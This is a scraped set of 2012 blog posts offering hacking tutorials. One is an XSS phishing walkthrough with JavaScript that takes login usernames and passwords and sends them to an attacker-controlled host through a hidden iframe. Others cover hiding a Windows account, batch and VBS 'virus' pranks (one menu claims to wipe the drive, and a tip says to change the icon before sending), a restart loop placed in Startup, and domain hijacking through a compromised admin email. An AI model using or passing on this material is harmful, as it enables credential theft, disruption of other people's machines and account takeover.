Linux 32-bit - <a href="http://getmantra.googlecode.com/files/Mantra%20Security%20Toolkit%20-%20Gandiva.tar.bz2" target="_blank">Mantra Security Toolkit - Gandiva.tar.bz2</a><br />
Windows - <a href="http://getmantra.googlecode.com/files/OWASP%20Mantra%20Security%20Toolkit%20-%20Gandiva.exe" target="_blank">OWASP Mantra Security Toolkit - Gandiva.exe </a></div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com8tag:blogger.com,1999:blog-8450897627020793899.post-42668955746435017202012-08-25T06:09:00.002-07:002012-11-27T21:15:06.790-08:00What is cross site scripting XSS<div dir="ltr" style="text-align: left;" trbidi="on">
XSS are certainly changing the away that Phishing attacks are perpetrated.<br />
<br />
This video is controversial by Brial Contos, CISSP from a company named IMPERVA. it takes through each and every step involved to find a xss vulnerability in a webpage . and showcases some of the basic steps that you need to know.<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/r79ozjCL7DA" width="560"></iframe><br />
<br />
for example we have a target as :-<br />
http://Thewebsite.com/google/add.php?request=<br />
<br />
Suppose, there is a login form and a XSS vulnerability in the <br />
same page. <br />
In order to perpetrate the phishing attack one need to inject JavaScript code in the <br />
variable to make that the victim’s browser load a JavaScript file. <br />
From a brief analyses at the HTML that the site generates I know that :<br />
<br />
• The value that the variable “request” receives is not sanitized at all.<br />
<br />
• The login form is named “login_clientes”<br />
<br />
• The login form have two input fields for user data: “user” and “pass”.<br />
<br />
So I will use the following JavaScript code:<br />
<br />
loginForm = document.forms['login_clientes']; <br />
function parseData() <br />
{ <br />
var username = loginForm.user.value; <br />
var password = loginForm.pass.value; <br />
saveData(username,password); <br />
return true; <br />
} <br />
function saveData(username,password) <br />
{ <br />
var frame=document.createElement('iframe'); <br />
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" + <br />
password; <br />
frame.style.display='none'; <br />
document.body.appendChild(frame); <br />
} <br />
loginForm.onsubmit = parseData;<br />
<br />
So, if browsing a page like (don’t forget to encode the part of the injection):<br />
http://Thewebsite.com/google/add.php?request=<script language="JavaScript" src="http://yourhost/yourJavaScriptfile.js" type="text/javascript"></script> <br />
A victim will give you his personal data, as long as he clicks the Submit button. <br />
<br />
The ideas that you must have in mind are:<br />
<br />
• If you can make the user browser load your JavaScript file or code when visiting <br />
some site, you can change that site behavior.<br />
<br />
• If some site has forms and XSS vulnerabilities you can try to get the user <br />
inputted data.<br />
<br />
• If the user trust the site, the user will, probably, give his personal data <br />
anywhere in that site.<br />
<br />
And if the site has vulnerabilities in some page where it doesn’t have forms, and have <br />
some form(s) in other page(s).</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com4tag:blogger.com,1999:blog-8450897627020793899.post-91123539391416684542012-08-23T08:50:00.000-07:002012-11-27T21:34:55.737-08:00How to create a invisible account in windows XP<div dir="ltr" style="text-align: left;" trbidi="on">
1. Open Start menu then click on RUN. <br />
2. Type in the Run Window Regedit <br />
3. Windows Registry editor will open then navigate from the left panel :<br />
<br />
<span style="background-color: #eeeeee;">HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList</span><br />
<br />
4. Create a new DWORD, setting its name to the name of the account you wish to hide.<br />
5. Then set its value to 0 to hide it.<br />
6. Enjoy its Hidden !!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhstgtW8by5AaH6yre6doPF8yWpaqbUJa7-r6N7C7apZokHZxjZsNKp04xBTFmcoZUgGdekDRkkdwAs68YgpHDRm2FmFrvF4p5kb61TntLxeWJYszruUYpDlvQwZUWOddB-NqU7lKkFAuk/s1600/safemodecp-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhstgtW8by5AaH6yre6doPF8yWpaqbUJa7-r6N7C7apZokHZxjZsNKp04xBTFmcoZUgGdekDRkkdwAs68YgpHDRm2FmFrvF4p5kb61TntLxeWJYszruUYpDlvQwZUWOddB-NqU7lKkFAuk/s320/safemodecp-b.jpg" width="320" /></a></div>
<br />
<br />
<b>NOTE </b>: This account isn't completely hidden because it is visible to administrators in Local User and Groups and also the profile is visible in the Documents and Settings.<br />
<br />
<b>Now How To Login In it after you have hidden the account :</b><br />
<br />
1. At Welcome screen, and you want to login to this account. <br />
2. Press Ctrl+Alt+Delete twice and it will display the log-on promt. <br />
3. Type the username, and the password and hit enter.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com4tag:blogger.com,1999:blog-8450897627020793899.post-68169766862426246282012-08-22T09:11:00.001-07:002012-11-27T21:34:55.727-08:00Batch file programming commands<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjguvle7EXD8Pjtdpix4kTQ7vwnXXoyjfS14-1cIlSH_VU_IJqXnR2taUo6GvN8KN6CDmCFvou1sPlcucu8vKGPF-1UuFRXs37BMYTxcX5mh2hSgXUUTrgrA7ZuCt3Vpta-Bma-vwMvNzk/s1600/batch-file-programming.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjguvle7EXD8Pjtdpix4kTQ7vwnXXoyjfS14-1cIlSH_VU_IJqXnR2taUo6GvN8KN6CDmCFvou1sPlcucu8vKGPF-1UuFRXs37BMYTxcX5mh2hSgXUUTrgrA7ZuCt3Vpta-Bma-vwMvNzk/s320/batch-file-programming.png" width="298" /></a></div><br />
<a href="http://www.blogger.com/blogger.g?blogID=8450897627020793899" style="display: inline !important; font-family: Helvetica, Arial, sans-serif; font-size: 14px; margin: 12px auto 6px;" title="View Batch File Programming"></a><br />
<iframe class="scribd_iframe_embed" data-aspect-ratio="0.772727272727273" data-auto-height="true" frameborder="0" height="800" id="doc_42138" scrolling="no" src="http://www.scribd.com/embeds/20907626/content?start_page=1&view_mode=list&access_key=key-e2dp5kbnz76k6e47cma" width="100%"></iframe></div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com4tag:blogger.com,1999:blog-8450897627020793899.post-14831469199544015372012-06-23T02:00:00.002-07:002012-11-27T21:34:55.709-08:00Notepad Virus Codes<div dir="ltr" style="text-align: left;" trbidi="on">
<u>Cycle a message in your friend's computer</u>:<br />
<span style="background-color: white;">open notepad and Type :</span><br />
@ECHO off<br />
:Begin<br />
msg * Hi<br />
msg * Are you having fun?<br />
msg * I am!<br />
msg * Lets have fun together!<br />
msg * Because you have been o-w-n-e-d<br />
GOTO BEGIN<br />
<br />
Save it as Anything.BAT and send it to ur frenz or enemy.<br />
<br />
<u>Convey your friend a lil' message and shut down his / her computer</u>:<br />
Type :<br />
<br />
wx@echo off<br />
msg * I don't like you<br />
shutdown -c Error! You are too stupid! -s<br />
<br />
Save it as Anything.BAT in All Files and send it.<br />
<br />
<u>Open Notepad continually in your friend's computer</u>:<br />
Type :<br />
<br />
@ECHO off<br />
:top<br />
START %SystemRoot%\system32<br />
otepad.exe<br />
GOTO top<br />
<br />
Save it as Anything.BAT and send it.<br />
<br />
<u>Hack your friend's keyboard and make him type You are a fool simultaneously</u><br />
Type :<br />
<br />
Set wshShell = wscript.CreateObject(WScript.Shell)<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys You are a fool.<br />
loop<br />
<br />
Save it as Anything.VBS and send it.<br />
<br />
<u>Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!</u><br />
Type :<br />
<br />
Set oWMP = CreateObject("WMPlayer.OCX.7")<br />
Set colCDROMs = oWMP.cdromCollection<br />
do<br />
if colCDROMs.Count >= 1 then<br />
For i = 0 to colCDROMs.Count - 1<br />
colCDROMs.Item(i).Eject<br />
Next<br />
For i = 0 to colCDROMs.Count - 1<br />
colCDROMs.Item(i).Eject<br />
Next<br />
End If<br />
wscript.sleep 5000<br />
loop<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<u>Toggle your friend's Caps Lock button simultaneously:</u><br />
Type :<br />
<br />
Set wshShell =wscript.CreateObject("WScript.Shell")<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys "{CAPSLOCK}"<br />
loop<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<u>Frustrate your friend by making this VBScript hit Enter simultaneously</u>:<br />
Type :<br />
<br />
Set wshShell = wscript.CreateObject("WScript.Shell")<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys "~(enter)"<br />
loop<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<u>Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out</u>:<br />
Type :<br />
<br />
WScript.Sleep 180000<br />
WScript.Sleep 10000<br />
Set WshShell = WScript.CreateObject("WScript.Shell")<br />
WshShell.Run "notepad"<br />
WScript.Sleep 100<br />
WshShell.AppActivate "Notepad"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "Hel"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "lo "<br />
WScript.Sleep 500<br />
WshShell.SendKeys ", ho"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "w a"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "re "<br />
WScript.Sleep 500<br />
WshShell.SendKeys "you"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "? "<br />
WScript.Sleep 500<br />
WshShell.SendKeys "I a"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "m g"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "ood"<br />
WScript.Sleep 500<br />
WshShell.SendKeys " th"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "ank"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "s! "<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<u>Frustrate your friend by making this VBScript hit Backspace simultaneously</u>:<br />
Type :<br />
<br />
MsgBox "Let's go back a few steps"<br />
Set wshShell =wscript.CreateObject("WScript.Shell")<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys "{bs}"<br />
loop<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<span style="background-color: white;"><u>Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action</u>:</span><br />
<br />
1: Shutdown<br />
2: Restart<br />
3: Wipes out your hard drive (BEWARE)<br />
4: Net send<br />
5: Messages then shutdown<br />
Type :<br />
<br />
@echo off<br />
title The end of the world<br />
cd C:\<br />
:menu<br />
cls<br />
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...<br />
pause<br />
echo Pick your poison:<br />
echo 1. Die this way (Wimp)<br />
echo 2. Die this way (WIMP!)<br />
echo 3. DO NOT DIE THIS WAY<br />
echo 4. Die this way (you're boring)<br />
echo 5. Easy way out<br />
set input=nothing<br />
set /p input=Choice:<br />
if %input%==1 goto one<br />
if %input%==2 goto two<br />
<br />
Save it as "Anything.BAT" and send it.<br />
<br />
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.<br />
<br />
<u>Threten by making screen flash</u><br />
<br />
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.<br />
<br />
@echo off<br />
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg<br />
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg<br />
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg<br />
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg<br />
echo g=100>>\z.dbg<br />
echo q>>\z.dbg<br />
debug <\z.dbg>nul<br />
del \z.dbg<br />
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.<br />
@echo off<br />
:a<br />
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg<br />
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg<br />
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg<br />
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg<br />
echo g=100>>\z.dbg<br />
echo q>>\z.dbg<br />
debug <\z.dbg>nul<br />
del \z.dbg<br />
goto a<br />
<br />
To disable error open task manager (ctrl+shirt+esc) then end process wscript.exe<br />
<br /></div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com5tag:blogger.com,1999:blog-8450897627020793899.post-60435579230592183352012-06-22T00:45:00.000-07:002012-11-27T21:34:55.721-08:00How to make a notepad virus<div dir="ltr" style="text-align: left;" trbidi="on">
To create a virus using notepad you should know that notepad can be used as source file for <a href="http://www.tachdigit.com/2012/06/batch-file-programming.html" target="_blank">batch file programming</a>. When we save notepad file as <b>.bat</b> or <b>.cmd</b> it becomes batch file.<br />
<br />
Now you should know how to use command prompt. Such as here we are using commands for shutdown or restart.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPyzAwYRQayOpayu_rtk1QTdi6s3px32749YcZmToPUBNf7DZ81HGeQ-n_t_dR5413az-weaotXjrtwQ9ACwoaQJpEmrhMLZfj13wWy5b3hpWtpuQB6r-DdJ-ZIA8GPtArbI_wfdo5Xyk/s1600/shutdown+command.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPyzAwYRQayOpayu_rtk1QTdi6s3px32749YcZmToPUBNf7DZ81HGeQ-n_t_dR5413az-weaotXjrtwQ9ACwoaQJpEmrhMLZfj13wWy5b3hpWtpuQB6r-DdJ-ZIA8GPtArbI_wfdo5Xyk/s320/shutdown+command.JPG" width="320" /></a></div>
<br />
Open command prompt and type in it <b>shutdown</b>. This will show you all shutdown parameters, some of which –s, –r and –a are for shutdown and restart respectively. <br />
<br />
Try using –s parameter first in command prompt. Open cmd and type <b>shutdown –s</b>. This will give you warning start countdown of 30sec to save your work.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsEGlbJzLEpxeOpJ2qjX5inBEeeepnVkSuQz-kDnbOC1sRMqxUvuIZuft23wA6V_6wFgedmYLISJ6sy_sHzZi6S5dSKvaVvkLk5WNvUYCrdIz0maTwzoPyIirwBfbxwjZILjx_VV_0TWQ/s1600/shutdown+warning.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsEGlbJzLEpxeOpJ2qjX5inBEeeepnVkSuQz-kDnbOC1sRMqxUvuIZuft23wA6V_6wFgedmYLISJ6sy_sHzZi6S5dSKvaVvkLk5WNvUYCrdIz0maTwzoPyIirwBfbxwjZILjx_VV_0TWQ/s1600/shutdown+warning.JPG" /></a></div>
<br />
To stop this countdown type <b>shutdown –a</b> .<br />
<br />
Open your notepad and simply type <b>shutdown –r</b> and save it as <b>xyzname.bat</b> now double clicking this file will restart your computer. To auto initiate it, paste it in the startup folder in start>all programs>Startup.<br />
<br />
Now after pasting whenever computer is started again, it will start restarting continuously. To stop this this use shutdown –a in cmd and delete that file from startup.</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com11tag:blogger.com,1999:blog-8450897627020793899.post-79321757617626518012012-06-17T00:41:00.000-07:002012-06-17T00:41:09.445-07:00Domain Hijacking – How to Hack a Domain Name<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFbPGq-x_g2f28HZKBld-B55Elm4ci2WIz9ng8Ubu6bUQ-U8LICQ_3hnXlWzDOQd322sc0TARNPxXk4mPaU-ranpyCYw_g0rB848Sx8CTcTgSwDCsSwZR_71gj6s8qmaa47q6vJ8DEdOg/s1600/uk_domain_names.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFbPGq-x_g2f28HZKBld-B55Elm4ci2WIz9ng8Ubu6bUQ-U8LICQ_3hnXlWzDOQd322sc0TARNPxXk4mPaU-ranpyCYw_g0rB848Sx8CTcTgSwDCsSwZR_71gj6s8qmaa47q6vJ8DEdOg/s320/uk_domain_names.jpg" width="320" /></a></div>
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients<br />
<ol style="text-align: left;">
<li>The domain registrar name for the target domain.</li>
<li>The administrative email address associated with the target domain.</li>
</ol>
These information can be obtained by accessing the <a href="http://en.wikipedia.org/wiki/WHOIS" target="_blank">WHOIS</a> data of the target domain. To get access the WHOIS data, goto <a href="http://whois.domaintools.com/">whois.domaintools.com</a>, enter the target domain name and click on Lookup (you need to register to view administrative contact information). Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.<br />
<br />
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.<br />
<br />
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.<br />
<br />
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.</div>
<br /></div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com6